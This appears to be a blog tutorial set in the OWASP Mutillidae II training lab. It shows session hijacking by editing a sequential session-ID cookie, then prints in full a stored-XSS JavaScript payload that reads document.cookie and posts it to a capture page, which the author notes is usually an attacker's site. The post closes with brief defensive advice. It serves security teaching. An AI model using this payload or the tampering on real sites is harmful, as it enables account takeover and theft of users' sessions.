Do you remember this classic episode where Tom Hiddleston teaches Cookie Monster a lesson in delayed gratification? I’m with Cookie Monster on this – can’t wait, let’s get to cookies right now!
We’ll need extensions for our browser to manage cookies and since I use Firefox I’ll use «Cookie Manager+».
Cookies!
Let’s create two accounts in our OWASP Mutillidae II database. Let’s name them Elmo and Bert. Now login with Elmo. Looks good, in the upper right corner we can see it:
Great, it works, and now let’s look at cookies. We can see that our Session ID number is 27:
Remember this number.
Now let’s log out and login as Bert. Check cookie manager again. Interesting, our Session ID is now 28:
It seems that the web application just assigns the next number for the next session. Ok, here’s some magic – let’s change this Session ID number back to 27 and refresh the page. Oops, we’re Elmo again. What happened? Well, the web application identifies us by our cookie, and cookie tampered. We can check any other number to find another session at some point. Imagine that anyone can get to the admin session without a login and password. Creepy, but take another cookie.
Properly configured web application generates long and random session IDs so there’s no way to guess it. Well, there’s no need to guess it since we can steal cookies.
(Yes, I just can’t get enough with Cookie Monster memes =))
Let’s see this example «A1: Injection (SQL)» > «SQLi – Insert Injection» > «Add to your blog». Let’s a specially generated script to the page as a blog entry. Actually, we’re also going to exploit stored XSS here, but we’ll learn this term much later. There is a bunch of «default» scripts for this kind of attack and we’ll use one bundled with Mutilidae at \xampp\htdocs\mutillidae\documentation\Mutillidae-Test-Scripts.txt:
var lXMLHTTP;
try{
var lData = "data=" + encodeURIComponent(document.cookie);
var lHost = "localhost";
var lProtocol = "http";
var lFilePath = "/mutillidae/capture-data.php";
var lAction = lProtocol + "://" + lHost + lFilePath;
var lMethod = "POST";
try {
lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
}catch (e) {
try {
lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
}catch (e) {
try {
lXMLHTTP = new XMLHttpRequest();
}catch (e) {
//alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
}
}
}//end try
lXMLHTTP.onreadystatechange = function(){}
lXMLHTTP.open(lMethod, lAction, true);
lXMLHTTP.setRequestHeader("Host", lHost);
lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
lXMLHTTP.send(lData);
}catch(e){
}This script takes cookies from user session and copies it to some other web page. Usually it is our web site somewhere on the Internet. OWASP Mutilidae II has a special section – «Other» > «Data capture pages» > «Data capture». This script will post its data right there.
Ok, let’s post this script as a blog entry, and then login as our old buddy Elmo. Now let’s switch to captured data page and here we are:
Here’s captured cookie, and we can use it impersonate Elmo.
What can we do about it?
Well, there are several evasion techniques. First of all, we can use server-side secure session management that generates random (really random!) session IDs. Session IDs must have appropriate idle time-outs, plus user log-out must be handled properly.
No comments:
Post a Comment